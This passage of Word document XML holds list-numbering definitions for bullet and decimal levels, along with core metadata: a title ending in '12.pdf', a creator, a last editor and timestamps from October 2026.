      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3786" w:hanging="255"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="95602E02">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4715" w:hanging="255"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7930B742">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5644" w:hanging="255"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DDC6756E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6573" w:hanging="255"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A096435A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7502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19C97BB7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F33C100A"/>
    <w:lvl w:ilvl="0" w:tplc="A3988FAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="744" w:hanging="361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3E160C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1602" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="22E03D8C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7E2AB476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4" w:tplc="A0E6193C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5" w:tplc="88FA8958">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5050" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="81C61F52">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5912" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0428C594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8" w:tplc="5484AA36">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7636" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="247614346">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="81719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A4"/>
    <w:rsid w:val="0008106A"/>
    <w:rsid w:val="00953AA4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A15E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ind w:right="9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5"/>
      <w:ind w:right="10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24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12.pdf</dc:title>
  <dc:creator>Dhanam</dc:creator>
  <cp:keywords>DAHYjHgKO38,BAGdGyxEk7A</cp:keywords>
  <cp:lastModifiedBy>deva dharashani</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-21T12:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-21T12:02:00Z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